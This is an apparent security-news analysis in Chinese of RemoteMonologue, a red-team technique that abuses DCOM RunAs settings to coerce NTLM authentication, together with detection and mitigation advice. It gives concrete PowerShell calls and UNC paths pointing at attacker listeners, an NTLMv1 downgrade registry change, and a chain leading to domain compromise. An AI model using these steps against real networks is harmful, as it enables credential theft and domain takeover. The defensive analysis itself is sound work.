1 簡介

傳統的認證資料竊取技術,如 LSASS 存取和 Mimikatz,由於 Windows 強化安全功能以及精密的端點偵測與回應(EDR)解決方案,面臨越來越多的限制。隨著 Microsoft 加強防禦,紅隊必須轉向「living off the land」(LOTL)技術,濫用合法系統功能。RemoteMonologue 代表了 認證資料收集的典範轉移 ,通過武器化 Distributed Component Object Model (DCOM) 以遠端強制 NTLM 認證, 無需執行 Payload 或與 LSASS 互動 。這項技術由 IBM X-Force 研究人員於 2025 年 4 月公開,利用 Windows COM/DCOM 架構的基礎特性,通過認證強制實現認證資料竊取,標誌著進攻性安全技術的重大進展。

RemoteMonologue 如何利用 DCOM 進行認證資料竊取 | 資訊安全新聞

2 DCOM 技術基礎

元件物件模型(COM)是 Windows 核心互操作機制(interoperability mechanism) ,使軟體元件能夠跨越程序邊界進行互動。其分散式擴展(DCOM)促進了網路基礎的通訊,允許遠端機器上的程序呼叫 COM 物件的方法。DCOM 物件暴露兩個主要元素:

  • Properties :表示物件狀態/設定
  • Methods :定義可執行動作(例如,檔案建立、程序執行)

DCOM 通訊需要在目標系統上具有本機管理員權限,定位為 特權橫向移動向量(privileged lateral movement vector) 。「RunAs」登錄設定(位於 HKEY_CLASSES_ROOT\AppID\{AppID_GUID} 下)控制執行環境。當設定為「Interactive User」時,DCOM 物件在當前登錄使用者的安全環境中執行,無需知道認證資料即可實現 Session 劫持。

3 RemoteMonologue 技術機制

3.1 攻擊流程與關鍵技術

攻擊序列包含四個關鍵階段:

  1. 登錄修改
    • 攻擊者利用 SeTakeOwnershipPrivilege (本機管理員預設擁有)取得 DCOM 物件 AppID 登錄鍵的所有權
    • 授予自己完全控制權限
    • 修改 RunAs 值為「Interactive User」
  2. DCOM 物件實例化
    • 通過 CoCreateInstanceEx 或 PowerShell [System.Activator]::CreateInstance 進行遠端啟動
    • 指定目標 IP 和 CLSID(例如,
      [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("03837546-098b-11d8-9414-505054503030", "172.22.166.170"))
  3. 認證強制
    • 呼叫觸發 SMB 或 HTTP 認證到攻擊者控制的監聽器的方法/屬性
    • UNC 路徑(例如, \\attacker-IP\share )作為參數傳遞,強制進行 NTLM 交換
  4. 認證資料處理
    • 捕獲 NetNTLMv1/v2 hashes 進行離線破解
    • 將認證分程傳遞到 LDAP 或 AD CS 等服務

3.2 武器化的 DCOM 物件

研究人員識別出三個易於武器化的關鍵 DCOM 物件:

  • ServerDataCollectorSet (CLSID: {03837546-098B-11D8-9414-505054503030})
    • 利用接受 CabFilename DestinationPath 參數的 DataManager.Extract 方法
    • UNC 路徑注入:
      $a.DataManager.Extract("\\172.22.164.58\john\cena.txt","xforcered") 強制 NTLMv2 認證
    • 結合 RunAs 修改可捕獲互動使用者的認證資料
  • FileSystemImage (CLSID: {2C941FC5-975B-59BE-A960-9A2A262853A5})
    • 獨特的基於屬性的強制(相較於方法呼叫)
    • WorkingDirectory 屬性修改為 UNC 路徑立即觸發認證
    • 由於無方法呼叫,偵測概率較低
  • UpdateSession (CLSID: {4CB43D7F-7EEE-4906-8698-60DA1C38F2FE})
    • AddScanPackageService 方法接受 UNC 路徑
    • 捕獲對 Silver Ticket 攻擊有價值的機器帳戶認證資料

3.3 進階強制技術

  • NetNTLMv1 Downgrade
    • 修改 HKLM\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel 至 2 或更低
    • 強制 NTLMv1 認證,易受彩虹表破解(自 2024 年 12 月起公開可用)
  • WebClient Service Abuse
    • 通過 WebDAV 啟用基於 HTTP 的認證強制
    • UNC 格式: \\MYHACKERBOX@80\giveme\creds.txt
  • Credential Spraying
    • 在多個系統上驗證認證資料同時捕獲 hashes

4 偵測與緩解策略

4.1 預防措施

  • 協議強化
    • 啟用 LDAP Signing 和 Channel Binding:防止中繼攻擊的關鍵(Windows Server 2025 預設強制執行)
    • 強制 SMB Signing:防止 SMB 中繼攻擊(網域控制器預設要求)
  • 認證現代化
    • 在可能的情況下停用 NTLM
    • 升級至 Windows 11 24H2/Server 2025:移除 NTLMv1 支援
  • DCOM 安全性
    • 通過 Component Services 限制 DCOM 啟動權限
    • 對 AppID 鍵實施登錄 ACL 強化

4.2 偵測機會

  • 登錄監控
    • 即時稽核 HKEY_CLASSES_ROOT\AppID\ 下的 RunAs 值變更
    • 偵測 LmCompatibilityLevel 修改
  • DCOM 活動分析
    • 記錄對關鍵 CLSID 的存取({03837546-098B-11D8-9414-505054503030}, {2C941FC5-975B-59BE-A960-9A2A262853A5})
    • 監控帶有 UNC 路徑的 DataManager.Extract WorkingDirectory 修改
  • 服務異常
    • 來自遠端系統的 WebClient 服務啟動
    • 對外部 IP 的意外 NTLM 認證

5 攻擊影響分析

5.1 企業風險評估

RemoteMonologue 引入 多重攻擊路徑 ,對業務造成關鍵影響:

  • 認證資料竊取
    • 通過 Session 劫持收集特權使用者認證資料
    • 機器帳戶洩露啟用 Kerberos 攻擊
  • 中繼攻擊啟用
    • AD CS HTTP Endpoints (ESC8):憑邆註冊以實現網域持續性
    • LDAP 中繼:修改特權群組成員資格
    • SharePoint/Exchange 洩露:業務應用程式接管
  • 偵測規避
    • 零 Payload 執行避免 EDR 審查
    • 合法 DCOM 程序掩蓋惡意活動

5.2 攻擊案例研究

一個理論攻擊鏈展示關鍵風險:

  1. 攻擊者通過釣魚攻擊洩露工作站使用者
  2. 通過 RemoteMonologue 的 -query 模組列舉網域伺服器上的有效 Session
  3. 修改 ServerDataCollectorSet 的 RunAs 登錄值為「Interactive User」
  4. 呼叫指向 Responder(監聽器)的 UNC 路徑的 Extract 方法
  5. 捕獲網域管理員的 NTLMv2 hash
  6. 將認證中繼到 AD CS HTTP endpoint (ESC8) 進行憑證註冊
  7. 使用 PKINIT 認證執行 DCSync 攻擊
  8. 實現完整網域洩露

影響指標

  • 網域洩露時間:< 2 小時
  • 偵測概率:< 5%(基於未監控的 DCOM 事件)
  • 基礎設施需求:僅需原生 Windows 工具

6 未來研究方向

  • 協議演進分析
    • 調查 QUIC 傳輸對強制技術的影響
    • 分析 RPC over HTTPv2 安全影響
  • 增強認證保護
    • 機器層級的 Extended Protection for Authentication (EPA) 實現
    • NTLMv3 加密分析與遷移路徑
  • 主動防禦機制
    • RPC 呼叫 Fingerprinting 以識別惡意強制模式
    • AppID 登錄修改的行為分析
    • 誘捕 DCOM 物件以吸引攻擊者

7 結論

RemoteMonologue 代表了 認證存取技術的根本轉變 ,利用 DCOM 的架構特性實現認證強制,無需傳統惡意軟體執行要求。其效能來自三個關鍵因素:濫用合法功能(RunAs 登錄設定)、認證捕獲的靈活性(多個 DCOM 物件)以及適應偵測規避(無檔案操作)。緩解需要 分層方法( layered approach) ,結合協議強化(LDAP/SMB 簽章)、系統現代化(移除 NTLMv1)以及對 DCOM 活動和登錄修改的細粒度監控。隨著 Microsoft 持續棄用 NTLM,本研究強調採用現代認證協議的緊迫性,同時預測攻擊者在強制遺留系統方面的創新。

參考文獻

  1. IBM X-Force. "RemoteMonologue: Weaponizing DCOM for NTLM Authentication Coercions" (2025)
  2. RemoteMonologue GitHub Repository. 3lp4tr0n/RemoteMonologue
  3. GBHackers. "‘RemoteMonologue’ New Red Team Technique Exploits DCOM To Steal NTLM Credentials Remotely"
  4. SRA. "Coercing Authentication from a Domain System: Analyzing a New Test Case from the 2025 Threat Simulation Index"
  5. Akamai. "CVE-2022-30216 - Authentication coercion of the Windows Server Service"
  6. Horizon3.ai. "The Elephant In the Room - NTLM Coercion and Understanding Its Impact"
  7. CybersecurityNews. "New Red Team Technique 'RemoteMonologue' Exploits DCOM To Gain NTLM Authentication Remotely"

附錄:關鍵 CLSID 與登錄路徑

DCOM 物件

  • ServerDataCollectorSet: {03837546-098B-11D8-9414-505054503030}
  • FileSystemImage: {2C941FC5-975B-59BE-A960-9A2A262853A5}
  • UpdateSession: {4CB43D7F-7EEE-4906-8698-60DA1C38F2FE}

登錄鍵

  • RunAs 設定:HKEY_CLASSES_ROOT\AppID\{AppID_GUID}
  • NTLM 相容性:HKLM\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel
Copyright © 2025 版權所有 翊天科技有限公司